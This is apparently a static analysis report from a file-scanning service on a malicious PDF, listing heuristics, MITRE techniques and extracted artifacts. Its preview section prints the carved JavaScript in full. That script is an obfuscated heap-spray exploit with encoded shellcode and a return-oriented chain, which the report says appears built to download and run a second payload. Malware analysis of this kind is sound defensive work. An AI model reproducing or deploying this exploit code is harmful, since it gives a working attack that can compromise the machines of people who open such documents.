MALICIOUS
100
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1566.001 Spearphishing Attachment
The PDF file contains embedded JavaScript, identified by multiple heuristics including 'PDF_JAVASCRIPT' and 'PDF_JS'. The JavaScript code uses 'unescape' and string manipulation to obfuscate its content, and appears to be constructing a URL or command to download and execute a secondary payload. The ML classifier also flagged this PDF as malicious with a high score.
Machine Learning
- Nyx PDF Classifier malicious score 0.9691
Heuristics 7
-
RichMedia (Flash) high PDF_RICHMEDIAPDF contains /RichMedia (Adobe Flash) which is a historic exploit vector (matched inside decoded stream)
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload (matched inside decoded stream)
-
PDF paints image(s) but contains no text operators info PDF_IMAGE_ONLY_LUREPDF has 1 image XObject(s) and the content stream contains no text-emitting operators (BT/ET, Tj, TJ, ', ") in either raw bytes or decompressed streams — this is the screenshot-as-PDF pattern used to bypass text-based scanners and to deliver instructions purely through rendered pixels. It is informational unless paired with invisible links or risky URI context.
-
PDF differential parser failed info PDF_DIFFERENTIAL_PARSE_FAILEDThe cross-check parser (pdfminer.six) failed on this file: PDF differential parser failed: PSEOF. Static heuristics still ran and any of their findings above are valid; only the differential cross-check signal is missing.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj-001_000.js |
pdf-javascript-stream | PDF /JS object -1 at offset 0x397 | 2711 bytes |
SHA-256: acf34747b223fb7e8846ac29cb6671d11bd1996e1e4f668a0a38c51c0b259087 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var ss;//ahlfah
for(i=0;i<18000;i++)
ss = ss+0x70;
function rep(str)
{
var sc='';
for(var i=2;i<str["\x6c\x65\x6e\x67\x74\x68"];i+=6)
sc+="\x25\x75"+str["\x73\x75\x62\x73\x74\x72"](i,4);
return sc;
}
var une = unescape;
var sc = "48c8d94874d948f42448eeba48dee04829dc485fc9483ab1485731488314481c0148243c485a0748dcde4859ee48dcda48e0ee48ef8148842e48e95548e0de48dcde4896654857d248fc9848b255486be648fc8848d665489ee64895f6488d2d4895654857e248ce9a48dfa648b61b48aa5548e3ce48ef2b48a92748719f4825ed4807ed485ee148e4ce48941c481dd648ed254806dd480bae48e72f4895f148823948be6548dffa48863348d055486ba548c080483ded48d85548e36548771b4802b748ef6248633548d81d48e08448238d481cb948dbe548139b488357487912488e8c4897114823da481c99488b21487916489cb448e08648dcce481fee48d4a9481fbc48288948a76748b626486dee482899481fbe48d4a9489711482326481c99488b21486b1e48d09148a765481c264842e648ec5e48a00f482b3c48b711483426481faf4823214885f848cc24482aba484d7148e84248aa04487b434803a348bc0848dcda48dddb48dcdf48e72a48dcdd48e3ca48dcde";
sc = une(rep(sc));
var p = unescape;
var len = "\x6c\x65\x6e\x67\x74\x68";
var s2 = "\x73\x75\x62\x73\x74\x72\x69\x6e\x67";
var s3 = "\x73\x75\x62\x73\x74\x72";
function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__[s3](___,4);return _;}
function AppendLoop(ss,len)
{
for(slen=0;slen<len;)
{
ss +=ss;
slen = ss.length;
}
return ss;
}
function s()
{
c=p(a("58585858"));
c = AppendLoop(c,65508);
b = c[s2](0,(0x5858-0x24)/2);
b += p(a("585858582fe10700deadbeefb00bface5868585849190700cccccccc48ef0700156f0700cccccccc90840700908407009084070090840700908407009084070090330700908407000c0c0c0c9084070090840700908407009084070090840700908407009084070090840700159907000124000172f707000104000115bb070010000000154d070015bb070003007ffe7fb2070015bb070000110001a8ac070015bb070001000001a8ac070072f707000011000152e207005c540700ffffffff0100000100000000010400011000000000400000d731070015bb0700905a9054154d0700a722070015bb0700eb5a5815154d0700a722070015bb07001a8b1889154d0700a722070015bb0700c0838304154d0700a722070015bb070004c2fb81154d0700a722070015bb070058585858154d0700a722070015bb0700ee7505eb154d0700a722070015bb0700e6e8ffff154d0700a722070015bb070090ff9090154d0700a722070015bb070090909090154d0700a722070015bb070090909090154d0700a722070015bb0700ffff90ff154d0700d7310700112f0700"));
b += sc;
b += c;
d = b[s2](0,0x10000/2);
e = c[s2](0,0x8000-(0x1020-0x08)/2);
d = AppendLoop(d,0x80000);
_3 = d[s2](0,0x80000-(0x1020-0x08)/2);
_4= new Array();
_5 = new Array();
for(i=0;i<0x300;i=i+1)
for(j=0;j<16;j++)
_5[i*16+j]=e+"y";
for(i=0;i<0x300;i=i+1)
for(j=0;j<15;j++)
_5[i*16+j]="t";
for(i=0;i<0x1F0;i=i+1) _4[i] =_3 + "s";
}
s();
|
|||
objstm_0027_00.bin |
pdf-objstm-decoded | PDF /ObjStm 27 0 obj (inflated) | 1170 bytes |
SHA-256: 667b2c75ccf7ac530ab7ab1335ed88701c878c9bd33ce7626a853b18be32e7d1 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.